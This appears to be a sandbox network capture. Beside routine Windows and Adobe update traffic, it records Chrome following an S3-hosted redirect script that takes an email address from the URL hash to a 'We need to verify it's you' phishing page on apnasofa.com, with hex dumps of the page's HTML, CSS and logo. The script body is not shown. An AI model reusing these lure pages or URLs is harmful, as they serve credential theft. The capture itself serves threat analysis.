                                                        2024-11-29 13:29:57 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                        Range: bytes=0-2147483646
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-11-29 13:29:58 UTC515INHTTP/1.1 200 OK
                                                        ApiVersion: Distribute 1.1
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        Content-Type: application/octet-stream
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        Server: ECAcc (lpl/EF06)
                                                        X-CID: 11
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-weu-z1
                                                        Cache-Control: public, max-age=193542
                                                        Date: Fri, 29 Nov 2024 13:29:57 GMT
                                                        Content-Length: 55
                                                        Connection: close
                                                        X-CID: 2
                                                        2024-11-29 13:29:58 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.164971616.182.103.344436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:00 UTC690OUTGET /vocabulary.html HTTP/1.1
                                                        Host: i--iy.s3.us-east-1.amazonaws.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:00 UTC413INHTTP/1.1 200 OK
                                                        x-amz-id-2: 87dHxt3ZoAGAV7Wj+CObgdMSmblQfZ9ldzv7JGz1woDY2QXkeaGa9l9L2QhnuYm5jWc6KDoNhF4=
                                                        x-amz-request-id: GY0CQS81Y5MQBTK1
                                                        Date: Fri, 29 Nov 2024 13:30:01 GMT
                                                        Last-Modified: Thu, 28 Nov 2024 20:19:57 GMT
                                                        ETag: "495735a2f76daba1413c4e6e2f30911b"
                                                        x-amz-server-side-encryption: AES256
                                                        Accept-Ranges: bytes
                                                        Content-Type: text/html
                                                        Content-Length: 442
                                                        Server: AmazonS3
                                                        Connection: close
                                                        2024-11-29 13:30:00 UTC442INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 2f 2f 20 47 65 74 20 74 68 65 20 65 6e 63 6f 64 65 64 20 65 6d 61 69 6c 20 70 61 72 61 6d 65 74 65 72 20 66 72 6f 6d 20 74 68 65 20 55 52 4c 20 68 61 73 68 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6d 61 69 6c 45 6e 63 6f 64 65 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 20 2f 2f 20 52 65 6d 6f 76 65 20 74 68 65 20 66 69 72 73 74 20 63 68 61 72 61 63 74 65 72 20 27 23 27 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 64 69 72 65
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <script> // Get the encoded email parameter from the URL hash var emailEncoded = window.location.hash.substring(1); // Remove the first character '#' // Redire


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.1649717172.202.163.200443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:00 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A87pXaBcgMWUtrF&MD=HdDwbW9w HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                        Host: slscr.update.microsoft.com
                                                        2024-11-29 13:30:01 UTC560INHTTP/1.1 200 OK
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/octet-stream
                                                        Expires: -1
                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                        MS-CorrelationId: 4dcc5594-56f1-4bdd-adaa-290306ceb711
                                                        MS-RequestId: 0fe282cf-9644-417a-9a2f-66cf8d77f247
                                                        MS-CV: Ks/IhMKdkkuw2HUa.0
                                                        X-Microsoft-SLSClientCache: 2880
                                                        Content-Disposition: attachment; filename=environment.cab
                                                        X-Content-Type-Options: nosniff
                                                        Date: Fri, 29 Nov 2024 13:29:59 GMT
                                                        Connection: close
                                                        Content-Length: 24490
                                                        2024-11-29 13:30:01 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                        2024-11-29 13:30:01 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.164971823.195.76.1534435688C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:01 UTC390OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                        Host: armmf.adobe.com
                                                        Connection: keep-alive
                                                        Accept-Language: en-US,en;q=0.9
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        2024-11-29 13:30:02 UTC247INHTTP/1.1 200 OK
                                                        Server: Apache
                                                        Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                        ETag: "78-5faa31cce96da"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 120
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Date: Fri, 29 Nov 2024 13:30:02 GMT
                                                        Connection: close
                                                        2024-11-29 13:30:02 UTC120INData Raw: 46 69 6c 65 20 74 68 61 74 20 61 63 74 73 20 6c 69 6b 65 20 61 20 4b 69 6c 6c 20 73 77 69 74 63 68 20 66 6f 72 20 53 4d 53 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 69 6e 20 52 65 61 64 65 72 2e 20 44 65 6c 65 74 65 20 74 68 69 73 20 66 69 6c 65 20 74 6f 20 65 6e 61 62 6c 65 20 74 68 65 20 6b 69 6c 6c 20 73 77 69 74 63 68 20 69 6e 20 52 65 61 64 65 72 2e
                                                        Data Ascii: File that acts like a Kill switch for SMS functionality in Reader. Delete this file to enable the kill switch in Reader.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.1649722103.160.107.1384436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:03 UTC706OUTGET /episode/index HTTP/1.1
                                                        Host: apnasofa.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://i--iy.s3.us-east-1.amazonaws.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:04 UTC1028INHTTP/1.1 200 OK
                                                        Connection: close
                                                        cache-control: public, max-age=2592000
                                                        expires: Sun, 29 Dec 2024 13:30:04 GMT
                                                        content-type: text/html
                                                        last-modified: Thu, 28 Nov 2024 09:22:09 GMT
                                                        accept-ranges: bytes
                                                        content-length: 1471
                                                        date: Fri, 29 Nov 2024 13:30:04 GMT
                                                        server: LiteSpeed
                                                        x-xss-protection: 1; mode=block
                                                        x-frame-options: SAMEORIGIN
                                                        x-content-type-options: nosniff
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        permissions-policy: geolocation=self
                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                        x-permitted-cross-domain-policies: none
                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-11-29 13:30:04 UTC340INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 6c 65 61 73 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>pleased</title> <link rel="stylesheet" href="style.css"></head><body> <div class="container"
                                                        2024-11-29 13:30:04 UTC1131INData Raw: 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 2f 6c 6f 67 6f 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 4c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 65 20 6e 65 65 64 20 74 6f 20 76 65 72 69 66 79 20 69 74 27 73 20 79 6f 75 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6d 61 69 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                        Data Ascii: tainer"> <img src="image/logo.png" class="logo" alt="Logo"> </div> <div class="header"> We need to verify it's you </div> <div class="email-container"> <div


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.1649721103.160.107.1384436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:04 UTC553OUTGET /episode/style.css HTTP/1.1
                                                        Host: apnasofa.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://apnasofa.com/episode/index
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:05 UTC1027INHTTP/1.1 200 OK
                                                        Connection: close
                                                        cache-control: public, max-age=2592000
                                                        expires: Sun, 29 Dec 2024 13:30:04 GMT
                                                        content-type: text/css
                                                        last-modified: Thu, 28 Nov 2024 13:58:47 GMT
                                                        accept-ranges: bytes
                                                        content-length: 3703
                                                        date: Fri, 29 Nov 2024 13:30:04 GMT
                                                        server: LiteSpeed
                                                        x-xss-protection: 1; mode=block
                                                        x-frame-options: SAMEORIGIN
                                                        x-content-type-options: nosniff
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        permissions-policy: geolocation=self
                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                        x-permitted-cross-domain-policies: none
                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-11-29 13:30:05 UTC341INData Raw: 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 41 46 41 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f 3b 0a 20 20 20
                                                        Data Ascii: * { margin: 0; padding: 0; box-sizing: border-box;}body { background-color: #FFFAFA; font-family: 'Segoe UI', Arial, sans-serif; line-height: 1.6; color: #333;}.container { max-width: 800px; margin: 40px auto;
                                                        2024-11-29 13:30:05 UTC3362INData Raw: 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 3b 0a 7d 0a 0a 2f 2a 20 4c 6f 67 6f 20 53 74 79 6c 65 73 20 2a 2f 0a 2e 6c 6f 67 6f 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 36 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 0a 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20
                                                        Data Ascii: px rgba(0, 0, 0, 0.1);}/* Logo Styles */.logo-container { text-align: center; margin-bottom: 20px; padding: 10px;}.logo { max-width: 160px; height: auto; margin: 0 auto;}.verification-section { text-align: center;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.1649725103.160.107.1384436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:06 UTC604OUTGET /episode/image/logo.png HTTP/1.1
                                                        Host: apnasofa.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://apnasofa.com/episode/index
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:07 UTC1030INHTTP/1.1 200 OK
                                                        Connection: close
                                                        cache-control: public, max-age=31536000
                                                        expires: Sat, 29 Nov 2025 13:30:07 GMT
                                                        content-type: image/png
                                                        last-modified: Thu, 28 Nov 2024 06:32:18 GMT
                                                        accept-ranges: bytes
                                                        content-length: 21327
                                                        date: Fri, 29 Nov 2024 13:30:07 GMT
                                                        server: LiteSpeed
                                                        x-xss-protection: 1; mode=block
                                                        x-frame-options: SAMEORIGIN
                                                        x-content-type-options: nosniff
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        permissions-policy: geolocation=self
                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                        x-permitted-cross-domain-policies: none
                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-11-29 13:30:07 UTC338INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 4f 00 00 01 34 08 06 00 00 00 44 9d 7b b3 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 dc 49 44 41 54 78 da ec dd 4b 72 1b 49 da 20 5a af b2 1c 37 d5 2b 20 ea 6e 80 ac 15 10 39 e9 1e 92 35 6f 33 22 57 20 a6 71 01 82 16 40 4b e6 0a 14 32 eb 79 51 c3 be 93 04 57 50 e4 06 ba c0 15 94 78 37 f0 df 70 d0 91 82 28 3e 40 12 08 77 8f 38 c7 2c 0c 59 59 29 21 e0 8f 08 77 ff fc 11 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 7f 79 ea ff fc ff 8e fe 9f f3 f6 63 5f 32 f1 52 ff ed e2 ff 8e 5f f3 e7 3e fc bf 61 d2 7e 4c a4 20 af d0
                                                        Data Ascii: PNGIHDRO4D{pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<RIDATxKrI Z7+ n95o3"W q@K2yQWPx7p(>@w8,YY)!w7yc_2R_>a~L
                                                        2024-11-29 13:30:07 UTC14994INData Raw: 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00 00 00 00 00 82 e0 29 00 00 00 00 00 00 c0 82 e0 29 00 00 00 00 00 00 40 10 3c 05 00 00 00 00 00 00 58 10 3c 05 00 00 00 00 00 00 08 82 a7 00 00 00 00 00 00 00 0b 82 a7 00 00 00 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00
                                                        Data Ascii: A`A ,SS x xOO))@<X<A`A ,SS x xOO
                                                        2024-11-29 13:30:07 UTC5995INData Raw: dd 7a 7f 92 b3 bc a4 5d b1 e8 a6 4d f6 ae 84 67 c4 3a 79 2e 78 0a 00 6f d7 b7 40 e3 6d 30 b8 43 47 d2 39 76 a5 0c 82 37 72 84 02 95 f0 3c de 4b b3 c1 87 62 2a df 8b 7e 6f 7c ed c1 f3 7a 56 c0 3d c4 01 d8 21 4d 8c 98 a8 d7 14 cc f1 11 f4 c6 40 ce 8d cf d9 87 9d f6 6d f2 53 9a e0 74 38 f0 76 d9 90 9c 84 bc ab 8c d7 ce 73 c1 53 00 78 a3 b4 fd d6 75 8f 7e d2 85 ad 02 e9 ba cc 15 72 1f 07 6d c7 ed 44 76 a0 7e 3c 68 10 3b 12 a4 55 a7 07 99 6f e3 da ec f7 67 35 ea f5 46 0c 62 f5 69 1a 94 cd fd 7e bf 4d 13 c6 e0 21 82 a7 f4 49 15 db 71 be 45 e6 1d c8 76 43 ff 26 3f 4d b5 cb 86 a1 90 36 d9 da 79 2e 78 0a 00 9b 71 ee b7 40 2f 3a 2b 53 db f7 52 92 34 41 e7 a6 80 5b 89 67 9f 4e 07 90 e4 25 fc c6 46 c9 af a6 5e bc f6 fe 73 9e 97 b6 6a 28 67 7e 4f 43 fe 15 0e 06 66 79
                                                        Data Ascii: z]Mg:y.xo@m0CG9v7r<Kb*~o|zV=!M@mSt8vsSxu~rmDv~<h;Uog5Fbi~M!IqEvC&?M6y.xq@/:+SR4A[gN%F^sj(g~OCfy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.1649724103.160.107.1384436588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-29 13:30:06 UTC539OUTGET /episode/script.js HTTP/1.1
                                                        Host: apnasofa.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://apnasofa.com/episode/index
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-29 13:30:07 UTC1066INHTTP/1.1 200 OK
                                                        Connection: close
                                                        cache-control: public, max-age=2592000
                                                        expires: Sun, 29 Dec 2024 13:30:07 GMT
                                                        content-type: text/javascript
                                                        last-modified: Thu, 28 Nov 2024 14:11:15 GMT
                                                        accept-ranges: bytes
                                                        content-length: 8831
                                                        date: Fri, 29 Nov 2024 13:30:07 GMT
                                                        server: LiteSpeed
                                                        x-xss-protection: 1; mode=block
                                                        x-frame-options: SAMEORIGIN
                                                        x-content-type-options: nosniff
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        permissions-policy: geolocation=self
                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                        x-permitted-cross-domain-policies: none
                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                        access-control-allow-origin: *
